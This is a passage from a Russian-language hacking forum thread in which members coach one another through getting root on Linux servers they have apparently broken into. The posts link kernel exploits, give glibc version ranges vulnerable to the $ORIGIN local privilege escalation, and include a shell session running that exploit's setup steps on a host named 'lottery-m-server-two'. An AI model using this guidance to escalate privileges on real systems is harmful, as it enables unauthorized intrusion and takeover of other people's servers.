Старый 29.08.2012, 19:51   #531
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Цитата:
Сообщение от id13 Посмотреть сообщение
Linux www2 2.6.18-194.17.1.el5 #1 SMP Mon Sep 20 07:12:06 EDT 2010 x86_64
Цитата:
Сообщение от Pashkela Посмотреть сообщение
2 id13

http://www.exploit-db.com/exploits/15024/ - аутдейт, пробовать
http://www.exploit-db.com/exploits/15774/
http://www.exploit-db.com/exploits/15023/ - аутдейт, пробовать
http://www.exploit-db.com/exploits/14814/ - аутдейт, пробовать
2.6.37 и 2.6.18 - не разные серии?
Untitled вне форума   Ответить с цитированием
Старый 29.08.2012, 20:06   #532
Evgeha514
 
Регистрация: 27.08.2012
Сообщений: 7
Репутация: 0
По умолчанию

пытаюсь применить уязвимость Glibc по вот этому мануалу https://rdot.org/forum/showthread.php?t=817
не пойму что значит "Заменяем директорию на специально созданный эксплоит (имя директории будет открыто через dlopen):" как это сделать?

[ups@lottery-m-server-two ~]$ ls
enlightenment exploit glibc oradiag_ups payload.c pes
[ups@lottery-m-server-two ~]$ ln /bin/ping /tmp/exploit/target
[ups@lottery-m-server-two ~]$ exec 3< /tmp/exploit/target
[ups@lottery-m-server-two ~]$ ls -l /proc/$$/fd/3
lr-x------ 1 ups ups 64 Jul 3 08:08 /proc/7520/fd/3 -> /tmp/exploit/target
[ups@lottery-m-server-two ~]$ rm -rf /tmp/exploit/
[ups@lottery-m-server-two ~]$ ls -l /proc/$$/fd/3
lr-x------ 1 ups ups 64 Jul 3 08:08 /proc/7520/fd/3 -> /tmp/exploit/target (deleted)
Evgeha514 вне форума   Ответить с цитированием
Старый 29.08.2012, 21:01   #533
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

Evgeha514, я не помню сплоентов, которые пробивали бы 194.17. проверь суидники, может staprun старый

по глибцу - покажи
yum info glibc

может у тебя пропатченная версия.


Pashkela, там ядро 2009 года, какой бы NX в названии не был, по-любому что-нибудь пробьёт.
12309 вне форума   Ответить с цитированием
Старый 29.08.2012, 21:58   #534
Evgeha514
 
Регистрация: 27.08.2012
Сообщений: 7
Репутация: 0
По умолчанию

[ups@lottery-m-server-two ~]$ yum info glibc
Loaded plugins: fastestmirror, security
Could not retrieve mirrorlist http://mirrorlist.centos.org/?release=5&arch=i386& repo=addons error was
[Errno 4] IOError: <urlopen error (-3, 'Temporary failure in name resolution')>
http://mirror.yandex.ru/centos/5.5/addons/i386/repodata/repomd.xml: [Errno 4] IO Error: <urlopen error (-3, 'Temporary failure in name resolution')>
Trying other mirror.
http://ftp.chg.ru/pub/Linux/CentOS/5.5/addons/i386/repodata/repomd.xml: [Errno 4] IOError: <urlopen error (-3, 'Temporary failure in name resolution')>
Trying other mirror.
Evgeha514 вне форума   Ответить с цитированием
Старый 29.08.2012, 23:34   #535
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

а дальше? он должен версию выдать.
вообще пох, так попробуй
rpm -qf /lib/libc.so.6
12309 вне форума   Ответить с цитированием
Старый 30.08.2012, 05:52   #536
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

2 12309:

А зачем так сложно? А такой способ не покажет версию? Или есть особенности какие-то? Может правила подправить?
Pashkela вне форума   Ответить с цитированием
Старый 30.08.2012, 08:32   #537
Evgeha514
 
Регистрация: 27.08.2012
Сообщений: 7
Репутация: 0
По умолчанию

GNU C Library stable release version 2.5, by Roland McGrath et al.
Evgeha514 вне форума   Ответить с цитированием
Старый 30.08.2012, 09:58   #538
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

и? Что не получается? Систему узнал? Debian или нет? Почему пофиг на правила?

Не надо пытаться, надо выкладывать информацию

https://rdot.org/forum/showthread.php?t=2097

как минимум ls -la /lib
Pashkela вне форума   Ответить с цитированием
Старый 30.08.2012, 12:31   #539
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
2 12309:

А зачем так сложно? А такой способ не покажет версию? Или есть особенности какие-то? Может правила подправить?
не покажет, нужна именно редхатовская версия релиза.
сплоент для $ORIGIN работает в версиях <= glibc-2.5-49.el5_5.6 и glibc-2.12-1.7.el6_0.3
то есть версия может быть и "GNU C Library stable release version 2.5", а релиз 50-ый, с пропатченной уязвимостью.

в редхате 4 (glibc-2.3.4-2.43.el4_8.3 типа такого) не работает

в федоре то же, что в редхате

в 5 дебиане lib* уязвимы до версии 2.7-18lenny6

в других дистрах хз

Последний раз редактировалось 12309; 30.08.2012 в 12:37..
12309 вне форума   Ответить с цитированием
Старый 30.08.2012, 13:46   #540
Evgeha514
 
Регистрация: 27.08.2012
Сообщений: 7
Репутация: 0
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
и? Что не получается? Систему узнал? Debian или нет? Почему пофиг на правила?

Не надо пытаться, надо выкладывать информацию

https://rdot.org/forum/showthread.php?t=2097

как минимум ls -la /lib
я выкладывал информацию на 52 странице ты мне посоветовал 3 эксплоита у меня с ними ничего не получаеться что они написала, на предыдущей странице
Evgeha514 вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot